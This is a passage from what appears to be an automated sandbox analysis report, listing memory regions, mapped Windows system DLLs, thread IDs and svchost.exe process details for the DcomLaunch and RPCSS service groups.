filename = "" Region: id = 37393 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 37394 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 37395 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 37396 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 37397 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 37398 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 37399 start_va = 0x753e0000 end_va = 0x753e7fff entry_point = 0x753e0000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 37400 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 37405 start_va = 0xc0000 end_va = 0xc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 37406 start_va = 0x110000 end_va = 0x111fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 37407 start_va = 0x140000 end_va = 0x23ffff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 37408 start_va = 0x240000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 37409 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" 
filename = "" Region: id = 37410 start_va = 0x310000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 37411 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 37412 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 37421 start_va = 0x820000 end_va = 0x85ffff entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 37422 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 37444 start_va = 0x940000 end_va = 0x97ffff entry_point = 0x0 region_type = private name = "private_0x0000000000940000" filename = "" Region: id = 37445 start_va = 0x9b0000 end_va = 0x9effff entry_point = 0x0 region_type = private name = "private_0x00000000009b0000" filename = "" Region: id = 37446 start_va = 0xa60000 end_va = 0xa9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a60000" filename = "" Region: id = 37447 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 37448 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 37449 start_va = 0x76000000 end_va = 0x7609ffff entry_point = 0x76000000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 37713 start_va = 0xaf0000 end_va = 0xb2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 37714 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = 
"private_0x000000007ffd5000" filename = "" Region: id = 38520 start_va = 0x120000 end_va = 0x126fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 38521 start_va = 0x130000 end_va = 0x131fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 38522 start_va = 0x280000 end_va = 0x281fff entry_point = 0x280000 region_type = mapped_file name = "lsm.exe.mui" filename = "\\Windows\\System32\\en-US\\lsm.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\lsm.exe.mui") Thread: id = 1060 os_tid = 0x1dc Thread: id = 1085 os_tid = 0x244 Thread: id = 1113 os_tid = 0x2bc Thread: id = 1115 os_tid = 0x2c4 Thread: id = 1120 os_tid = 0x2d8 Thread: id = 1121 os_tid = 0x2dc Thread: id = 1122 os_tid = 0x2e0 Thread: id = 1123 os_tid = 0x2e4 Thread: id = 1126 os_tid = 0x2f0 Thread: id = 1128 os_tid = 0x2f8 Process: id = "670" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7f1d1120" os_pid = "0x23c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "667" os_parent_pid = "0x1c0" cmd_line = "C:\\Windows\\system32\\svchost.exe -k DcomLaunch" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\DcomLaunch" [0xa], "NT SERVICE\\PlugPlay" [0xe], "NT SERVICE\\Power" [0xa], "NT AUTHORITY\\Logon Session 00000000:000066e4" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 37100 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 37101 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" 
Region: id = 37102 start_va = 0x90000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 37103 start_va = 0xbd0000 end_va = 0xbd7fff entry_point = 0xbd0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 37104 start_va = 0x77b00000 end_va = 0x77c3bfff entry_point = 0x77b00000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 37105 start_va = 0x77d40000 end_va = 0x77d40fff entry_point = 0x77d40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 37106 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 37107 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 37108 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 37111 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 37113 start_va = 0xd0000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 37114 start_va = 0x77990000 end_va = 0x77a63fff entry_point = 0x77990000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 37115 start_va = 0x75eb0000 end_va = 0x75ef9fff entry_point = 0x75eb0000 region_type = mapped_file name = "kernelbase.dll" filename = 
"\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 37116 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 37117 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 37118 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 37119 start_va = 0x160000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 37120 start_va = 0x75f50000 end_va = 0x75ffbfff entry_point = 0x75f50000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 37121 start_va = 0x77c40000 end_va = 0x77c58fff entry_point = 0x77c40000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 37122 start_va = 0x77c80000 end_va = 0x77d20fff entry_point = 0x77c80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 37123 start_va = 0x260000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 37128 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 37129 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 37130 start_va = 0x3e0000 end_va = 0x41ffff entry_point = 0x0 region_type = private 
name = "private_0x00000000003e0000" filename = "" Region: id = 37131 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 37132 start_va = 0x2a0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 37133 start_va = 0x380000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 37134 start_va = 0x420000 end_va = 0x6eefff entry_point = 0x420000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 37135 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 37136 start_va = 0x75340000 end_va = 0x75388fff entry_point = 0x75340000 region_type = mapped_file name = "umpnpmgr.dll" filename = "\\Windows\\System32\\umpnpmgr.dll" (normalized: "c:\\windows\\system32\\umpnpmgr.dll") Region: id = 37137 start_va = 0x75320000 end_va = 0x75334fff entry_point = 0x75320000 region_type = mapped_file name = "spinf.dll" filename = "\\Windows\\System32\\SPInf.dll" (normalized: "c:\\windows\\system32\\spinf.dll") Region: id = 37138 start_va = 0x77780000 end_va = 0x77848fff entry_point = 0x77780000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 37139 start_va = 0x77160000 end_va = 0x771adfff entry_point = 0x77160000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 37140 start_va = 0x77c60000 end_va = 0x77c69fff entry_point = 0x77c60000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" 
(normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 37141 start_va = 0x77210000 end_va = 0x772acfff entry_point = 0x77210000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 37142 start_va = 0x754c0000 end_va = 0x754cdfff entry_point = 0x754c0000 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 37143 start_va = 0x140000 end_va = 0x15cfff entry_point = 0x140000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37144 start_va = 0x6f0000 end_va = 0x7b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 37145 start_va = 0x140000 end_va = 0x15cfff entry_point = 0x140000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37146 start_va = 0x77100000 end_va = 0x7711efff entry_point = 0x77100000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37147 start_va = 0x763d0000 end_va = 0x7649bfff entry_point = 0x763d0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 37148 start_va = 0x2e0000 end_va = 0x35ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 37149 start_va = 0x7c0000 end_va = 0x8c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 37150 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename 
= "" Region: id = 37151 start_va = 0x140000 end_va = 0x141fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 37152 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 37153 start_va = 0x260000 end_va = 0x260fff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 37154 start_va = 0x8d0000 end_va = 0xa0ffff entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 37155 start_va = 0xbe0000 end_va = 0xfd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000be0000" filename = "" Region: id = 37156 start_va = 0x75c40000 end_va = 0x75c4dfff entry_point = 0x75c40000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 37157 start_va = 0x8f0000 end_va = 0x92ffff entry_point = 0x0 region_type = private name = "private_0x00000000008f0000" filename = "" Region: id = 37158 start_va = 0xa00000 end_va = 0xa0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 37159 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 37160 start_va = 0x270000 end_va = 0x270fff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 37161 start_va = 0x75300000 end_va = 0x75316fff entry_point = 0x75300000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 37162 start_va = 0x75c50000 end_va = 0x75c5afff entry_point = 0x75c50000 region_type = mapped_file name = "profapi.dll" filename = 
"\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 37163 start_va = 0x752e0000 end_va = 0x752f5fff entry_point = 0x752e0000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 37164 start_va = 0xa70000 end_va = 0xaaffff entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 37165 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 37166 start_va = 0xa30000 end_va = 0xa6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 37167 start_va = 0xb90000 end_va = 0xbcffff entry_point = 0x0 region_type = private name = "private_0x0000000000b90000" filename = "" Region: id = 37168 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 37169 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 37170 start_va = 0xad0000 end_va = 0xb0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ad0000" filename = "" Region: id = 37171 start_va = 0x75ba0000 end_va = 0x75babfff entry_point = 0x75ba0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 37172 start_va = 0x752c0000 end_va = 0x752dffff entry_point = 0x752c0000 region_type = mapped_file name = "umpo.dll" filename = "\\Windows\\System32\\umpo.dll" (normalized: "c:\\windows\\system32\\umpo.dll") Region: id = 37173 start_va = 0x75c10000 end_va = 0x75c38fff entry_point = 0x75c10000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: 
"c:\\windows\\system32\\winsta.dll") Region: id = 37174 start_va = 0x774b0000 end_va = 0x7764cfff entry_point = 0x774b0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 37175 start_va = 0x75f20000 end_va = 0x75f46fff entry_point = 0x75f20000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 37176 start_va = 0x76000000 end_va = 0x7609ffff entry_point = 0x76000000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 37177 start_va = 0x77a70000 end_va = 0x77afefff entry_point = 0x77a70000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 37178 start_va = 0x76270000 end_va = 0x763cbfff entry_point = 0x76270000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 37179 start_va = 0x75f00000 end_va = 0x75f11fff entry_point = 0x75f00000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 37180 start_va = 0x752b0000 end_va = 0x752bafff entry_point = 0x752b0000 region_type = mapped_file name = "pcwum.dll" filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll") Region: id = 37181 start_va = 0xfe0000 end_va = 0x11affff entry_point = 0x0 region_type = private name = "private_0x0000000000fe0000" filename = "" Region: id = 37182 start_va = 0x950000 end_va = 0x98ffff entry_point = 0x0 region_type = private name = "private_0x0000000000950000" filename = "" Region: id = 37183 start_va = 0x10b0000 end_va = 0x10effff 
entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 37184 start_va = 0x1170000 end_va = 0x11affff entry_point = 0x0 region_type = private name = "private_0x0000000001170000" filename = "" Region: id = 37185 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 37186 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 37187 start_va = 0x75280000 end_va = 0x752a4fff entry_point = 0x75280000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 37188 start_va = 0x11b0000 end_va = 0x11effff entry_point = 0x0 region_type = private name = "private_0x00000000011b0000" filename = "" Region: id = 37189 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 37190 start_va = 0x75250000 end_va = 0x75274fff entry_point = 0x75250000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 37191 start_va = 0x75280000 end_va = 0x752a4fff entry_point = 0x75280000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 37192 start_va = 0x75250000 end_va = 0x75274fff entry_point = 0x75250000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 37193 start_va = 0x75280000 end_va = 0x752a4fff entry_point = 0x75280000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: 
"c:\\windows\\system32\\powrprof.dll") Region: id = 37194 start_va = 0x75250000 end_va = 0x75274fff entry_point = 0x75250000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 37195 start_va = 0x75280000 end_va = 0x752a4fff entry_point = 0x75280000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 37196 start_va = 0x75250000 end_va = 0x75274fff entry_point = 0x75250000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 37197 start_va = 0x75280000 end_va = 0x752a4fff entry_point = 0x75280000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 37198 start_va = 0x75250000 end_va = 0x75274fff entry_point = 0x75250000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 37199 start_va = 0x75280000 end_va = 0x752a4fff entry_point = 0x75280000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 37213 start_va = 0x11f0000 end_va = 0x122ffff entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 37214 start_va = 0x75250000 end_va = 0x752aefff entry_point = 0x75250000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 37215 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 37216 start_va = 
0x75b80000 end_va = 0x75b9afff entry_point = 0x75b80000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 37227 start_va = 0x270000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 37228 start_va = 0x7ffaf000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ffaf000" filename = "" Region: id = 37229 start_va = 0x75740000 end_va = 0x75755fff entry_point = 0x75740000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 37230 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 37231 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 37232 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 37233 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 37234 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 37235 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 37236 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 37237 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 37238 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = 
private name = "private_0x00000000002b0000" filename = "" Region: id = 37239 start_va = 0x753e0000 end_va = 0x753e7fff entry_point = 0x753e0000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 37240 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 37272 start_va = 0x990000 end_va = 0x9cffff entry_point = 0x0 region_type = private name = "private_0x0000000000990000" filename = "" Region: id = 37273 start_va = 0x1270000 end_va = 0x12affff entry_point = 0x0 region_type = private name = "private_0x0000000001270000" filename = "" Region: id = 37274 start_va = 0x7ffae000 end_va = 0x7ffaefff entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: id = 37377 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 37378 start_va = 0x360000 end_va = 0x376fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 38107 start_va = 0x2d0000 end_va = 0x2d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 38108 start_va = 0x760d0000 end_va = 0x76152fff entry_point = 0x760d0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 38109 start_va = 0x12b0000 end_va = 0x13affff entry_point = 0x0 region_type = private name = "private_0x00000000012b0000" filename = "" Region: id = 38110 start_va = 0x360000 end_va = 0x360fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 38126 start_va = 0xb10000 end_va = 0xb4ffff entry_point = 0x0 region_type = private name = 
"private_0x0000000000b10000" filename = "" Region: id = 38127 start_va = 0x7ffad000 end_va = 0x7ffadfff entry_point = 0x0 region_type = private name = "private_0x000000007ffad000" filename = "" Region: id = 38779 start_va = 0x74600000 end_va = 0x7460cfff entry_point = 0x74600000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 38854 start_va = 0x13b0000 end_va = 0x14affff entry_point = 0x0 region_type = private name = "private_0x00000000013b0000" filename = "" Thread: id = 1084 os_tid = 0x240 Thread: id = 1086 os_tid = 0x248 Thread: id = 1087 os_tid = 0x24c Thread: id = 1088 os_tid = 0x250 Thread: id = 1089 os_tid = 0x254 Thread: id = 1090 os_tid = 0x258 Thread: id = 1091 os_tid = 0x25c Thread: id = 1092 os_tid = 0x260 Thread: id = 1093 os_tid = 0x264 Thread: id = 1094 os_tid = 0x268 Thread: id = 1095 os_tid = 0x26c Thread: id = 1096 os_tid = 0x270 Thread: id = 1099 os_tid = 0x27c Thread: id = 1101 os_tid = 0x288 Thread: id = 1102 os_tid = 0x28c Thread: id = 1104 os_tid = 0x294 Thread: id = 1184 os_tid = 0x3e8 Process: id = "671" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7f1d1140" os_pid = "0x280" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "667" os_parent_pid = "0x1c0" cmd_line = "C:\\Windows\\system32\\svchost.exe -k RPCSS" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\RpcEptMapper" [0xe], "NT SERVICE\\RpcSs" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000a96e" [0xc000000f], "LOCAL" [0x7] Region: id = 37203 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" 
Region: id = 37204 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 37205 start_va = 0x110000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 37206 start_va = 0xbd0000 end_va = 0xbd7fff entry_point = 0xbd0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 37207 start_va = 0x77b00000 end_va = 0x77c3bfff entry_point = 0x77b00000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 37208 start_va = 0x77d40000 end_va = 0x77d40fff entry_point = 0x77d40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: 